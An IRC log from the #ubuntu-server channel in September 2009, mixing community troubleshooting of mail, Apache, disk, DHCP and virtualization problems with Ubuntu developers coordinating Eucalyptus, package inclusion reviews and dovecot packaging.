<_ruben> kernels dont get backported, yet, i think i heard about plans to do so in the (near or distant) future
<psteyn> So..manual compile?
<_ruben> one option would be to use a mainline build (doesnt have the ubuntu specific stuff in 'em though), or backport a karmic kernel
<_ruben> manual compile would be worst
<psteyn> meh.
<psteyn> thanks :]
<_ruben> karmic is on 2.6.31
<psteyn> can I get the deb src and create my own deb?
<_ruben> backporting isnt all that hard .. i think there's even a special tool for it .. prevu or something like that
<_ruben> sure
<psteyn> cool
<domas> I use newer kernels sometimes
<domas> check out the git repo, then run a packaging script, voila
<domas> (hardy has kernels that don't like my RAID controller)
<VK7HSE-Eee> having a small issue with the kernel that is default in Karmic Alpha6 it fails to recognise my IBM ServRAID 4LX has an issue that just says timeout ! so has older SCSI cards depreciated  ???
<VK7HSE-Eee> SCSI storage controller: Adaptec AIC-7892P U160/m (rev 02)  RAID bus controller: IBM ServeRAID Controller
<uvirtbot> New bug: #434507 in nagios3 (main) "package nagios3-common 3.0.6-2ubuntu1 failed to install/upgrade: ?j pre-removal szkript alfolyamat 2 hibak?ddal kil?pett" [Undecided,New] https://launchpad.net/bugs/434507
<Tejas> hi
<Tejas> how to restrict firewall with iptables??
<_ruben> how to wait for answers??
<nijaba> :D
<VK7HSE-Eee> to true!
<TANATHOS> Tejas was that a question?
<soren> It had a question mark at the end..
<soren> ...but he left.
 * soren takes a break
<incorrect> is there anyway to increase the number of inodes without reformatting?
<acalvo> Hi
<acalvo> in order to be able to send mail thru PHP in a ubuntu server, do I need to have sendmail installed if I'm have postfix installed in another server?
<_ruben> i'd install postfix locally (or another queue-based mta), so you wont lose any mail when the other server isnt available for whatever reason
<MatBoy> mhh, install symfony using pear is not working well
<MatBoy> _ruben: but it's always wise to send through an antispam-gateway, so never from the server itself
<_ruben> MatBoy: both actually .. local mta that has a spam-checking smarthost configured
<MatBoy> _ruben: that is what I say
<MatBoy> _ruben: it's actually a relay and not a smarthost anymore
<_ruben> MatBoy: not that much difference between the two in my eyes, then again, just blame microsoft for the term smarthost :)
<MatBoy> _ruben: hehe, you are never wrong ;)
<MatBoy> _ruben: there is a very BIG difference actually
<_ruben> then again, i think postfix on ubuntu uses the term smarthost as well
<acalvo> mmm
<acalvo> maybe a silly question
<MatBoy> _ruben: yes for n00bs :P
<acalvo> but, where can I change the smtp host variable for PHP?
<MatBoy> _ruben: smarthosts are used in sendmail which is a bitch anyway
<VK7HSE> I think I have resolved the issue I was having earlier, it appears by using the boot option of "pci=noacpi" the SCSI storage controller: Adaptec AIC-7892P U160/m (rev 02) & RAID bus controller: IBM ServeRAID Controller are discovered and the system can boot! so looks like my hardware isn't truly ACPI compliment!
<_ruben> acalvo: most likely in php.ini
<_ruben> VK7HSE: lovely
<acalvo> acalvo: well, that's what I've thought, but it does not seem to get the new values
<VK7HSE> _ruben: not wrong! I was sweating it out a bit there for a while! ... ;-)
<_ruben> acalvo: talking to yourself eh :)
<_ruben> acalvo: did you restart apache?
<acalvo> well, most BOFHs do it
<acalvo> yes, reload and restart
<acalvo> but I'm quite confused with the only win32 comment
<acalvo> I know what it means
<acalvo> I just don't understand why they put it there
<psteyn> where is the ubuntu git repo?  I want to get the latest kernel build from there
<_ruben> https://wiki.ubuntu.com/KernelTeam/KernelGitGuide
<soren> ttx: I'll roll a new Eucalyptus package before I go to lunch..
<soren> psteyn: kernel.ubuntu.com
<ttx> soren: ok
<psteyn> tnx
 * soren lunches
<acalvo> again, I've a question
<acalvo> I'm still setting up a mailing list
<acalvo> in a mail server
<acalvo> everything seems pretty easy
<acalvo> but there is one thing I need to settle down
<acalvo> my server has various DNS names
<acalvo> in order to use mailling lists, should I change the hostname? is it enough to set up a DNS name? should postfix know any of this names?
<kinnaz> it would be nice if postfix knows about the MX record
<acalvo> and this is setted up in the mydestination variable in the postfix main.cf?
<kinnaz> #postfix
<zul> morning
<szczym_> helo all, I have a script that makes a movie. When i run it from command line as normal user, it works. But when i run it from cron as ordinary user, it makes empty file. i been folowing tips from here: https://help.ubuntu.com/community/CronHowto could some one help me please ?
<soren> szczym_: I'd suggest you ask in a support forum for the encoder you're using (like #mplayer if you're using mencoder, etc.).
<ttx> cjwatson: I'm looking into eucalyptus failure to autoregister components right now -- Among other problems the latest eucalyptus refuses that you register things using "localhost", see bug 434593
<uvirtbot> Launchpad bug 434593 in eucalyptus "euca_conf --register-walrus localhost fails in 1.6~bzr808" [High,Triaged] https://launchpad.net/bugs/434593
<ttx> cjwatson: I'm not exactly sure how we can workaround that though... which makes the whole idea of autoregistering at risk
<jpds> soren: http://twitter.com/vrillusions/statuses/4151036378
<soren> jpds: Nor cron.
<jpds> Haha.
<soren> Well, it's Just Enough Operating System. That's the point.
<cjwatson> ttx: maybe we could use CC_NAME for that, or maybe we could fix that restriction
<domas> <3 deadlocked LVM on database box
<cjwatson> ttx: I'd recommend asking upstream why there's that restriction
<ttx> cjwatson: Will do. soren suggests that whatever it is registered with is passed to other elements in the cloud
<cjwatson> could be
<soren> It makes sense for both of them, really. They're infrastructure components needed by node controllers.
<soren> ...but it's still just guesswork.
<soren> I'm working on the (perhaps optimistic) assumption that it's a reasonable restriction.
<ttx> cjwatson: RE: "use CC_NAME": if it resolves to 127.0.{0,1}.1 it will still be refused. It's not just a "localhost" pure match
<cjwatson> don't do that then :-)
<cjwatson> but CC_NAME doesn't really have to be a DNS name
<cjwatson> so that probably isn't the right answer
 * soren goes to pick up his daughter at day care 
<acalvo> hi
<acalvo> some time ago someone suggest me a substituion for mailman, but I don't remember the name
<_ruben> ezmlm is the only other i know of
<BrixSat_> hi
<BrixSat_> F1 -> how can i see if proftpd is making querys to mysql correctly?
<acalvo> _ruben: I think it started with S
<acalvo> symphony
<acalvo> or something like that
<acalvo> but I'm not able to remember it
<acalvo> sympa!
<acalvo> ehehhee
<ttx> smoser: ping
<smoser> here
<ttx> smoser: did you file the missing MIR for the UEC images ?
<smoser> i don thave bugs yet, but spent the last day and this morning working on the 6 MIR.
<smoser> i would love review of them, i will open bugs rsn
<ttx> smoser: I can review that
<ttx> smoser: just give me the pointers
<smoser> k
<smoser> https://wiki.ubuntu.com/MainInclusionEc2-Init https://wiki.ubuntu.com/MainInclusionEuca2ools https://wiki.ubuntu.com/MainInclusionPython-Boto https://wiki.ubuntu.com/MainInclusionCheetah https://wiki.ubuntu.com/MainInclusionConfigobj https://wiki.ubuntu.com/MainInclusionM2crypto
<smoser> configobj is the one that i'm most concerned about.
<smoser> ttx, unless you object, i'm going to start filing bugs
<ttx> smoser: no, please do
<BrixSat> why this? http://pastebin.com/m7cc39b71
<BrixSat> i dont get it :s
<ttx> smoser: MainInclusionCheetah > "upstreaam" typo. I'd just say as Rationale that it's a dep of ec2-init
<ttx> smoser: MainInclusionConfigobj > needs some more meat, I guess. Ping zul if you need his MIRfiling expertise
<zul> hmmm?
<smoser> i agree it does
<smoser> its the hardest one to come up with
<smoser> as there are other config options in python in main
<smoser> zul, if you can offer time or help or whatever, please do
<zul> the MIR team is probably going to come back and say why dont you use the ones in main
<ttx> smoser: the "Does upstream expect it?" is not about asking upstream developers about it. In your case the rationale is more about dependencies
<smoser> what is "does upstream expect it" supposed to mean
<ttx> you need a rationale for ec2-init... then for all the others the rationale is "dependency of ec2-init"
<ttx> smoser: i don't really know -- sounds like a recent addition to the template (or one I always ignored)
<ttx> sore, smoser,zul: meeting time
<zul> ack
<smoser> o/
<slestak> kirkland: do you have a second to sound out an idea I have wrt byobu?
<BrixSat> what is the regular guid for proftpd?
<clusty> BrixSat, does it not run under it's own username (the demon) thus depends. usually 100+ 1000- ?
<clusty> depending on order you install services ?
<BrixSat> :/
<BrixSat> SQLMinUserGID
<BrixSat> this is my problem i think
<BrixSat> clusty i always get Resposta:	550 index.html: Permission denied
<BrixSat> i have that value at 500
<BrixSat> and in db they are 2001 and 2002
<BrixSat> uid an dgid 2002
<BrixSat> got it :p
<BrixSat> files were created by root
<BrixSat> and not the user :S
<clusty> :D
<aubre> Re: UEC - where is the best place to look to figure out why an instance you just launched went straight from pending to terminated?
<aubre> After the patches on karmic today I can at least attempt to launch an instance without getting a 403 error, but they stay at pending for about a minute then go straight to terminated
<mathiaz> zul: what is the bug number for puppet MIR?
<zul> mathiaz: 408297
<mathiaz> zul: where did you seeded it?
<zul> server-ship
<mathiaz> zul: where is the MIR for libaugeas-ruby?
<zul> mathiaz: eh?
<mathiaz> zul: it's required by puppet
<mathiaz> zul: http://people.canonical.com/~ubuntu-archive/component-mismatches.txt
<zul> crud
<mathiaz> zul: ^^ search for puppet
<zul> mathiaz: ill get that fixed asap
<mathiaz> zul: same for  libshadow-ruby
<KillMeNow> anyone seen a postfix crash like this:  connect #11 to subsystem private/rewrite: Connection refused  ?
<drurew> im looking for an irc server app
<drurew> to create my own network
<drurew> anyone have any ideas?
<giovani> apt-cache search ircd ?
<drurew> thanks
<ScottK> KillMeNow: No.  Look in the postfix logs.  They almost always tell the true story.
<jbernard> kirkland: i fixed a couple typos in byobu: lp:~jbernard/+junk/byobu
<kirkland> jbernard: thanks, committed, pushed
<KillMeNow> ScottK:  i've dug in to the mail.err | mail.warn | mail.log logs and i see when it crashed, but nothing that showed to be the culprit
<KillMeNow> hmmm
<KillMeNow> got me thinking tho
<zul> mathiaz: both are filed now
<jbernard> i was spinning through http://people.canonical.com/~ubuntu-archive/NBS, many of these reverse-depend on kvm or qemu which are virtual packages, this is the way we want it to be, correct?
<jbernard> or should those packages be updated to depend on qemu-kvm?
<smoser> jjohansen, you have a minute ?
<smoser> zul, might be interested also.
<mzungu> hello guys - I have a problem which i suspect is udev related.  I have a server - administered remotely - running 8.04LTS which has 2 hard disks - physically sda and sdb (well, at least for a long time it was).  sdb was a dd exact copy of sda after the server was upgraded to 8.04 from 6.06.  Now, after a catastrophic power failure, the server insists on booting from the back-up sdb instead of the main drive sda - like, they have k
<mzungu> inda swapped places.  Any ideas on how to get back to normality?
<giovani> mzungu: well there are a few things to look at -- first your bios hard drive boot order
<giovani> make sure that the drive you want is first in that order (switch them if you're not sure, and see what happens)
<mzungu> hmmm - it's remote
<giovani> well that's what out-of-band management is for
<giovani> or remote hands
<mzungu> ;)
<giovani> but it may also be that your grub config was somehow changed to boot from a different drive than where grub is installed
<alex_joni> are both drives accessible?
<Debolaz> DRAC5++ # Because it lets me do just about anything
<mzungu> yes - can see both drives
<mzungu> the grub comments claim it's sda
<mzungu> but sda seems to have swapped with sdb
<giovani> right, that can happen
<giovani> which is why ubuntu uses uuids
<giovani> not /dev names
<mzungu> sure
<giovani> so you need to establish, first, which drive is being booted by the bios
<giovani> so you know which one to edit the grub config of
<mzungu> and where i might have (unintentionally) messed up was after the upgrade to 8.04, i did a dd if=/dev/sda of=/dev/sdb to make an exact copy
<mzungu> i suspect the udev identifiers are therefore the same ;)
<alex_joni> mzungu: I don't think they can be the same
<mzungu> the system which boots is the state after upgrade - some 4 months ago
<alex_joni> afterall uuid stands for unique ..
<mzungu> which *was* sdb
<mzungu> udev makes my head spin ;)
<mzungu> i did try turning off bootable with fdisk - and now i seem to only have sdb and sdc
<mzungu> and sda is now non-existant!
<mzungu> (bring back the old days! - bloody hot-plug has a lot to answer for!)
<giovani> non-existant where?
<mzungu> well, i had sda and sdb
<mzungu> now i have sdb and sdc
<mzungu> at least, how fdisk sees them
<giovani> ok, in fdisk
<giovani> which one is being booted off of?
<mzungu> sda has gone
<mzungu> sdb i think
<giovani> you think? make sure
<mzungu> (in the fdisk context)
<giovani> what?
<giovani> mount
<giovani> look at where root is being mounted from
<mzungu> how can i see and relate uuid to a real physical partition?
<giovani> there's a /dev map for it
<mzungu> ok
<jjohansen> smoser: whats up?
 * mzungu goes to check...
<smoser> i figured you'd show up just as i was going to leave
<smoser> :)
<giovani> ls -l /dev/disk/by-uuid/*
<smoser> i'm putting comments into bug 431103 that seem to me to indicate changes in kernel cause init (and ohter user-level) boot messages to not go to console
<uvirtbot> Launchpad bug 431103 in ec2-init "ssh host key fingerprint no longer available in the console log" [High,Triaged] https://launchpad.net/bugs/431103
<jjohansen> smoser: okay thanks (late lunch today)
<mzungu> ah
<mzungu> ok - that's showing the sdc drive
<mzungu> lrwxrwxrwx 1 root root 10 2009-09-22 23:24 /dev/disk/by-uuid/ed3d5dd5-7c95-4e97-86eb-60f66cf54f4b -> ../../sdc2
<mzungu> sdc2 being the root partition
<mzungu> how do i con it into using what it now thinks is sdb?
<smoser> jjohansen, i added comment and console-output.tar.gz to that bug.
<smoser> please read, and refute me if you think i'm wrong
<smoser> i've got to run
<jjohansen> smoser: okay
#ubuntu-server 2009-09-23
<das7002> has any one else had issues with libc6 on the install cd failing the install?
<ScottK> Real install or VM?
<das7002> VM
<das7002> VirtualBox to be exact
<das7002> It goes to, "Running Post Install triggers for libc6" then, cleaning up less then a second later Red Error Screen
<ScottK> I remember something about people having trouble with that on Karmic recently, but don't recall the details.
<das7002> I guess I could install the Desktop edition and just obliterate x off of it
<ScottK> Wouldn't help.
<das7002> The desktop edition works fine in Vbox, it's the server that's being a bitch
<ScottK> I'm suprised it would be different.
<das7002> It has a different kernel? the desktop has -generic the server has -server
<centaur5> Could anybody tell me if my problem with a client joining an LDAP server would be related to the fact that I joined a new server with the same name as the old one?  The join is successful but I can't access the users.
<das7002> probably
<centaur5> Okay, I guess I'll have to find out how to clean up the client and start the config over.
<das7002> one thing I would suggest, name our servers in order of the greek alphabet, easy to remember and hard to repeat over
<centaur5> So I've never looked into this feature cause I've never needed to but can LDAP not have multiple domains it connects to like windows machines can?
<Hypnoz> when I disable active checks on a host from the webui, is that modifying any text files? i thought it was going to add a line like "active_checks_enabled   0" in that host stanza
<zul> smoser: ping
<smoser> zul here for a few minutes
<zul> smoser: got what I needed thanks though
<smoser> your secret theory working out?
<zul> not yet...waiting for console
<smoser> well, they say that patience is a virtue
<smoser> but its not one that was handed to me
<zul> just came up no init messages yet
<zul> checking my initrd
<twb> specbot: clhs all
<smoser> i can point you at my deubg initrd.
<twb> Oops, wrong channel.
<smoser> zul, ari-a47191cd. http://smoser.brickies.net/git/?p=misc-starter-tools.git;a=tree;f=ec2/debug-initramfs;h=f6179dbc85ff35cb649a46128832399894e3236f;hb=5f2d66130ffce56e3086d54e82661ee7b874f361
<smoser> you'll have to give yourself access to the initrd, i'm the only one that can right now.
<smoser> read the README, but basically, that initrd will let you take over by sourcing a file . if you put a file in the right place in /
<smoser> i've got to go for a bit. probably try to check in later.
<smoser> zul, just in case it wasn't obvious, thank you very much for your help.
<zul> smoser: no problem
<zul> smoser: im going to download the image and test it out locally ill let you know
<uvirtbot> New bug: #434986 in dovecot (main) "postfix ignores the rsyslog configuration directives" [Undecided,New] https://launchpad.net/bugs/434986
<uvirtbot> New bug: #434978 in tomcat6 (main) "Tomcat6 default installation does not create logs in /var/log/tomcat6. " [Undecided,New] https://launchpad.net/bugs/434978
<uvirtbot> New bug: #294186 in samba (main) "dlink network drive map login" [Undecided,Incomplete] https://launchpad.net/bugs/294186
<rpinto__> Hi room
<rpinto__> i have a problem with Smokeping
<rpinto__> i installed and configured it without any problem
<rpinto__> it worked fine for a day
<rpinto__> but now when i try to access the site, the latency graphs arnt being displyed
<rpinto__> i only get the headings and the graph area is lain white
<rpinto__> any ideas why this is happening now after it worked fine b4?
<twb> "B4" is an ISO/DIN paper size, not a word.
<twb> I'm not familiar with smokeping.  Have you tried checking the logs?
<psteyn> Hi, where would the java_home be after installing openjdk6 ?
<uvirtbot> New bug: #435061 in samba (main) "smbd loses connection on DHCP lease" [Undecided,New] https://launchpad.net/bugs/435061
<uvirtbot> New bug: #434915 in mysql-dfsg-5.1 (main) "mysql-server-5.1 can't chroot" [Low,Incomplete] https://launchpad.net/bugs/434915
<rpinto__> anybody worked on smokeping?
<rpinto__> it's configured by me successfully on the server
<rpinto__> but now, after workin fine all this time, the graphs arnt displayed on the site
<rpinto__> any idea why this is happening?
<martinjh99> Having problems getting mod_rewrite to work... The module is installed and enabled but I can't seem to get a simple rule to work.
<martinjh99> My .htaccess is here: http://paste.ubuntu.com/276250/ and the php page that is testing it out is here:  http://martinjh.homelinux.net/~martin/temp/rewrite.php
<martinjh99> It doesn't just work at all for some reason and I have no idea why...
<RoyK> martinjh99: try asking on #httpd
<martinjh99> Ah Ok - was asking here because it is an ubuntu Server Im running!
<rpinto__> hello
<domas> AllowOverride ?
<martinjh99-afk> domas where would I configure it? Sites-available/default?
<domas> I didn't touch apache configs properly for last 6 years or so
<domas> anyway, for .htaccess to work, directory scope has to have AllowOverride set to something
 * domas points at http://httpd.apache.org/docs/2.2/mod/core.html#allowoverride
<alvin> Can it be that NFS4 mounted filesystems do not respect setgid bits? Directories are created with the wrong permissions!
<vecy> hey guys i installed webmin - all of its modules etc... is there a way to clear apt-get it is always trying to get these packages which it failed to get
<vecy> now they are like always 'lets try again to get these'
<alvin> vecy: you can just apt-get remove (or purge) those packages and the package that depends on them
<alvin> hmmm, it's even in the Community documentation, but there is no bug: NFS4 does not respect UID/GID permissions. This is bad.
<vecy> now what is a save way to remove software
<vecy> for example i have apache2
<vecy> is it fine to do rm -rf
<vecy> or could that cause other stuff to break ?
<vecy> trouble rebooting :/
<vecy> shutdown: timeout opening/writing control channel /dev/initctl
<martinjh99> How do I check to see if mod_rewrite is correctly configured?  It seems to my non-expert eyes that is all installed ok but the rewrite rules aren't being followed.
<alex_joni> there is a mod_rewrite specific log function you can activate
<alex_joni> it helped me last time I tried to make it work..
<alex_joni> (don't remember the incantation though)
<martinjh99> Thanks Alex ;) Will check that out
<cycrosism> Who knows how to make apache listen on port 80 and 8080? I tried and edited the conf file and it says The requested URL / was not found on this server.
<martinjh99> Alex - http://httpd.apache.org/docs/2.0/mod/mod_rewrite.html#rewritelog
<alex_joni> martinjh99: that's what I remembered
<martinjh99> :)
<vecy> what are Alternatives to Webmin and Cpanel for linux ?
<pmatulis> vecy: some people use ebox.  also investigate the gadmin series of tools
<vecy> now lets say i have installed webmin
<vecy> how do i remove every single trace of it
<vecy> because when i remove it with apt-get remove and rm-rf etc..
<vecy> and install it again
<vecy> it still knows all my settings
<vecy> so it must be storing somewhere else - clueless how to remove it all
<alvin> !reinstall
<ubottu> To renew the configuration of a package when installing, sudo apt-get remove --purge <package> && sudo apt-get install <package>. Note that you will lose ALL config files for that package. WARNING: This is dangerous, don't do this with core packages
<pmatulis> vecy: 'sudo apt-get purge webmin'
<pmatulis> sorry, add remove, i'm used to aptitude
<vecy> so sudo apt-get purge remove webmin
<vecy> ?
<vecy> ops nvm see it
<pmatulis> remove purge
<vecy> k now i am installing it again - now when i login i hope it does not have my settings from prev install stored :P
<vecy> it still has the old settings :/ like
<vecy> Bind Dns is installed etc..
<vecy> which webmin doesnt install by default i installed it via webmin
<vecy> and now i want it to be gone
<pmatulis> maybe webmin sees it and adjusts itself
<vecy> true but for example it doesnt give me the option anymore because i manually removed apache
<vecy> to install it
<vecy> because webmin installs it and configure it etc.. now i cant do that anymore :/
<vecy> maybe i should reformat ?
<pmatulis> webmin causes more problems than it is supposed to solve evidently
<vecy> true i only liked the Virtual Hosts feature it was giving
<vecy> now i gota figure out how to clean the system
<vecy> i have all this stuff on there running
<vecy> bindns, mysql, apache, mailpostfix ....
<vecy> from webmin it left it all
<pmatulis> good luck
<vecy> ill do reformat :)
<vecy> and never get webmin again :)
<henkjan> vecy: you need a panel for apache vhosts, dns and mailconfig? Have a look at openpanel
<vecy> k thx
<vecy> yeah i just need one for that its a pain always adding them via ssh :P
<vecy> henkjan: does it also install mysql and apache for me or i must do that before ?
<henkjan> vecy: openpanel will install apache and mysql etc for you the right way (using dpkg/apt)
<vecy> henkajn: one more Q does it also have ftp configuration - so i dont have to do that manually
<vecy> im downloading it atm
<vecy> nvm i found info :)
<henkjan> cef: yep, also ftp
<vecy> henkjan: i am using apt-get install openpanel
<vecy> as stated on their site
<vecy> E: Couldn't find package openpanel
<henkjan> did you add the deb http://moonbase-beta.openpanel.com/pkg/debian4/i386 \
<henkjan> openpanel main
<henkjan> in /etc/apt/sources.list?
<henkjan> s/i386/amd64 when using amd64
<vecy> ah
<vecy> thank you
<vecy> alot of problems :/ just like virtualmin
<vecy> dpkg: error processing openpanel (--configure):
<vecy> and then bunch of stuff that failed
<henkjan> hmm, try Â» #openpanel on irc.oftc.net
<celephais> hi, ip link show give this output: eth1: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UP qlen 1000, what does LOWER_UP means?
<zul> morning
<celephais> hi, ip link show give this output: eth1: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UP qlen 1000, what does LOWER_UP means?
<celephais> how do i clean arp cache?
<domas> arp -a and arp -d
<zul> jdstrand: ping
<jdstrand> ?
<zul> jdstrand: you are running nut right can you try /etc/init.d/nut status and see its not lying to you (#416182)
<giovani> celephais: you shouldn't need to -- but you can delete an individual entry -- man arp
<celephais> ok thank you
<jdstrand> zul: I have nut on hardy and karmic-- are these both valid test cases?
<zul> jdstrand: i think so yes
<giovani> celephais: I'm not sure what LOWER_UP is -- it is related to link status though
<batfastad> Hi everyone. Just installed openvz per this https://help.ubuntu.com/community/OpenVZ but when I try and mount a USB drive on the host I get the following message "mount: unknown filesystem type vfat". I'm guessing the openvz kernel I installed doesn't have support for usb drives or fat16/32. Is there any way to fix this or do I have to drop back to another kernel?
<uvirtbot> New bug: #434535 in dpkg (main) "package apache2.2-common 2.2.11-2ubuntu2.3 failed to install/upgrade: EOF on stdin at conffile prompt" [Undecided,New] https://launchpad.net/bugs/434535
<jdstrand> zul: ok, apparently on upgrade I didn't end up with /etc/nut/nut.conf configured. I fixed that
<jdstrand> zul: I can confirm the bug
<zul> on both hardy and karmic?
<jdstrand> zul: hardy doesn't have the status command
<jdstrand> zul: I updated the bug
<zul> jdstrand: ah ok
<zul> jdstrand: thanks
<giovani> celephais: from some googling, LOWER_UP represents link status
<giovani> UP represents administrative status
<celephais> giovani, ok thank you
<ivoks> sommer: are you awake? :)
<benc> can two servers listen on the same port number but one on the local IP (127.0.0.1) and one on an external IP?
<ivoks> yes
<benc> are the two sockets completly separated like being on two different ports?
<zul> jdstrand: *sigh* I see where the bug is
<jdstrand> zul: that is a good thing, no?
<sommer> ivoks: yep, awake and at the day job
<zul> jdstrand: yeah just about to fix it for karmic
<ivoks> sommer: em... there's an error in serverguide
<ivoks> sommer: for jaunty
<sommer> ivoks: ah, which section?
<ivoks> sommer: is it possible to fix it? upstream's project developer asked for correction, cause people come to the list asking why stuff aren't working
<ivoks> https://help.ubuntu.com/9.04/serverguide/C/drbd.html
<ivoks> sommer: just remove 'allow-two-primaries;
<sommer> ivoks: probably we'll need to do an SRU, but may be able to get it through after string freeze for karmic
<ivoks> sommer: ok
<sommer> ivoks: gotcha, I'll make sure it's corrected for karmic at least
<ivoks> great
<ttx> \o/
<benc> ivoks: thanks
<zul> ttx: what was the \o/ for?
<ivoks> good morning :)
<ttx> zul: getting rid of that 403 in euca2ools
<zul> ttx: ah
<ttx> some stupid Java time conversion
 * ivoks is going to explode :)
<zul> hehe...java is your friend
<joe-mac> anybody know how to attach to the jsvc process that ubuntu's tomcat package runs under with jstack or jmap? whenever i try eitgher of the processes i get errors
<ivoks> zul: you are working on dovecot?
<zul> ivoks: yeah I got a dovecot 1.1.18 packaged I was going to a FFE and  upload after beta
<ivoks> oh
<zul> chanelog entry is a bit long ;)
<ivoks> where's the source?
<ivoks> i'd like to fix some packaging bugs, if possible
<zul> gimme a sec ill upload it to a ppa
<ivoks> great
<ivoks> zul: you've packaged new version of plugins we ship?
<zul> ivoks: uep
<ivoks> k
<zul> latest and greatest
<scheeri> HI Dear Comminity! We would like to create an Ubuntu Server Cloud pilot project, but there is a critical question: how can work fail tolerant the entire cloud (2 Cluster Controller and 2x5 Node Controllers), if the only one single Cloud Controller has been faild? Sorry for my English..
<ivoks> high availability cluster?
<zul> ivoks: it should be in my ppa now
<ivoks> k
<scheeri> Dear ivoks: you think we should to create a HA Cluster instead of a single server for Coud Controller?
<KurtKraut> scheeri, yes, you should work on a HA Cluster
<scheeri> Thank You KurtKraut
<ivoks> scheeri: well, yes
<ivoks> if you cloud controller is single point of failure, then yes, you need fail over cluster
<scheeri> And what's the matter with Cluster Controllers, in the example before I wrote 2 Cluster Controller with 2 x 5 Node Controllers, how can I make fault tolerant solution ? If 1 Node Controller will be crashed, the other 5 Node Controller will be failed too. Or not?
<scheeri> Sorry 1 Cluster Controller will be crashed and 5 Node Controller...
<KurtKraut> scheeri, I think your scenario is rather complex and would be more understandable if you could make some illustrations. So, I recommend you to try ask in ubuntuforums.org. You'll receive more extensive answers.
<vecy> can someone verify that i am not stupid! because Layered Technologies thinks they are SMart and im dumb i guess
<vecy> http://www.balkanheart.net/lt-false-advert.jpg
<vecy> they are trying to redefine Automatic OS Reload - lol - its been around and 1and1 hosting has had it for 2 yrs now... you can reload your OS from your account panel with a simple click
<scheeri> Thank You KurtKraut  , By :-D
<msknt> Sommer fanx for writing the Ubuntu Server Guide
<hansa> hi! hope someone can help me. i got a very strange problem with libvirtd. it doesnt start anymore. when i try to open it in debug mode it got follow error message: http://pastebin.com/m34eef8cd
<ivoks> zul: have you tried building it? :)
<zul> ivoks: yeah built fine
<ivoks> hm
<ivoks> 1 out of 17 hunks FAILED -- saving rejects to file dovecot-postfix.conf.rej
<zul> ivoks: crappers
<ivoks> zul: don't worry about that
<ivoks> i'll take care of it
<zul> ivoks:  yeah...that part is ugly i dont like it ;)
<ivoks> :)
<LeChacal> hello, i need to unload a module for a minute so that i can load another in first but it says that it is in use. Is there away to tell who is using a module so that i can stop it?
<LeChacal> never mind i found lsmod, unless anyone has something that tells more than what lsmod does.
 * zul lunches
<uvirtbot> New bug: #240249 in mailman (main) "Mailman does not display Unicode member names correctly." [Undecided,Incomplete] https://launchpad.net/bugs/240249
<uvirtbot> New bug: #400150 in libvirt (main) "Cannot determine QEMU argv syntax" [Undecided,New] https://launchpad.net/bugs/400150
<aljosa> is there some util/script that checks filesystem for file/folder permissions and reports which files have wrong permissions/ownership?
<jmarsden> LeChacal: modprobe -r MODULE will try to remove MODULE and all modules that require it, as long as they are not in use.  man 8 modprobe
<giovani> aljosa: what do you mean "wrong permissions"? There's no single correct permissions on an entire set of files in a filesystem -- that's why they're free to be changed/modified
<jmarsden> giovani: I'm guessing "the perms set during package install" would be "the right permissions"?  On RPM-based systems you can do something like rpm -Va to see all permission and file content changes made to files and dirs owned by the package management system.  I'm not sure if there is an exact equivalent in Debian/Ubuntu, but I think that is what aljosa may be looking for.
<ivoks> zul: accepting my debdiff? :)
<zul> ivoks: well see im at lunch
<ivoks> oh, sorry
<ivoks> zul: it's in your mailbox
<zul> ivoks: okies ill have a look
<ivoks> take care
<smoser> anyone know, is etienne out ?
<smoser> didn't -virtual used to be based off -server ?
<smoser> it appears now its -generic, but i thought it was -server
<giovani> smoser: what implies that?
<smoser> i just realized . on 32 bit, its -generic. on 64 bit its -server
<zul> smoser: I think he is around
<zul> smoser: yes -virutal used to be based off -server
<smoser> it still is for 64 bit.
<zul> yeah I think so
<RoyK> the difference between -server and -generic isn't really a lot
<smoser> soren, ping
 * RoyK gjetter at SÃ¸ren er dansk, evetuelt norsk
<aubre> I noticed on the latest karmic alpha 6 cds there is now an option to install Ubuntu Enterprise Cloud - how much more configuration is required once you use that option?
<aubre> does it handle things like dhcpd, postfix, etc.
<aubre> IP forwarding
<bnjmn> erichammond: is your Jaunty image pretty solid compared to Hardy and Intrepid?
<bnjmn> erichammond: also do you know if I can use one of the newer kernels from Canonical with your images?
<giovani> aubre: that type of information is provided on the ubuntu website (and eucalyptus' site)
<giovani> postfix is a mail server -- I'm not sure why that'd be a part of a cloud structure
<giovani> (as an application used on a cloud structure ... sure ... but any application might be -- and would be managed/installed the same way)
<zul> need to reboot
<aubre> giovani: well there isn't anything there that describes the implications of making that decision yet.
<IvanCosta> Hello, guys.
<IvanCosta> Do anyone know how I get a list of actives clients in DHCP server?
<IvanCosta> "Does" anyone know how I get a list of actives clients in DHCP server?
<IvanCosta> I sorry about the dumbie question, but I search so much in the Internet and forums and got nothing.
<aubre> giovani: originally , they suggested putting a mail server on the UEC front end so that when an administrator approved an account the new account holder would get their login info in an email. Now in 1.6 you don't have to do the email step.
<Keizer> Anyone here tried OCFS2?
<giovani> IvanCosta: that depends on the individual dhcp daemon
<giovani> IvanCosta: each has a different way of handling leases
<IvanCosta> Giovani: how I can get that list?
<IvanCosta> Don't exist a simple command to do this?
<pluma> I have a problem. I'm using a VHost with a pre-installed Ubuntu 8.04 system. I tried to follow the Ubuntu Help guide on setting up postfix with TLS, but that doesn't seem to get me anywhere because sendmail is listening on port 25 from the get-go and is not affected by what changes I make to postfix (duh). How can I set up a proper mailserver with TLS auth?
<pluma> s/pre-installed/pre-configured/
<pluma> Anyone?
<giovani> IvanCosta: I told you that it depends on the daemon you're using -- hopefully you know what dhcp daemon you use ...
<IvanCosta> Gionavi: I use Ubuntu Server 8.10 64 with DHCP3-server.
<habermann24> anybody here using KVM with Windows guests?
<habermann24> it works really great except i get very poor network speeds, even with virtio
<erichammond> bnjmn: I built private Jaunty AMIs for a client using Canonical's 2.6.27 kernel and they're happy so far.
<erichammond> bnjmn: If you don't need the particular newer kernel features, the standard public images seem to be working pretty well for most folks.
<erichammond> bnjmn: The choice of Hardy vs. Jaunty depends on what features and long term stability you need.
<Daviey> habermann24: even the mouse works ok?
<Daviey> habermann24: I used to have to add a "tablet" mouse.
<habermann24> Daviey: the mouse?? yea no problems
<habermann24> Daviey: well...i used VNC to remotely install them, and now i use remote desktop
<habermann24> Daviey: i get 200mb/sec hard drive IO
<habermann24> boots crazy fast
<habermann24> :)
<habermann24> network speed at 9mb/sec though..
<Daviey> habermann24: try using a tap?
